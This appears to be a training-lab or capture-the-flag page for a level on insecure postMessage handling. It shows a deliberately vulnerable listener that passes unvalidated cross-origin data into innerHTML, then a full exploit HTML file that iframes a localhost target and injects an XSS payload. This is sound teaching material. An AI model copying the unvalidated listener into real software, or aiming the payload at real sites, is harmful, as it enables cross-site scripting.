Level 4: Insecure postMessage
MISSION: This frame listens for cross-origin messages. You need to write an exploit locally (e.g. an HTML file on your desktop) that iframes this URL and sends it a malicious message.
Waiting for system message...
/// SOURCE CODE INSPECTOR ///
window.addEventListener('message', function(e) {
if(e.data && e.data.type === 'updateText') {
document.getElementById('msg-box').innerHTML = e.data.html;
}
});/// DECRYPTION COMPLETE ///
The event listener blindly trusts messages from any origin (no e.origin validation) and insecurely passes the html property into innerHTML. You must create a local HTML file and open it in your browser.
Exploit HTML File:
<iframe src="http://localhost:3000/level4" id="target"></iframe><script>
setTimeout(() => {
document.getElementById('target').contentWindow.postMessage(
{ type: 'updateText', html: '<img src=x onerror=alert(1)>' },
'*'
);
}, 1000);
</script>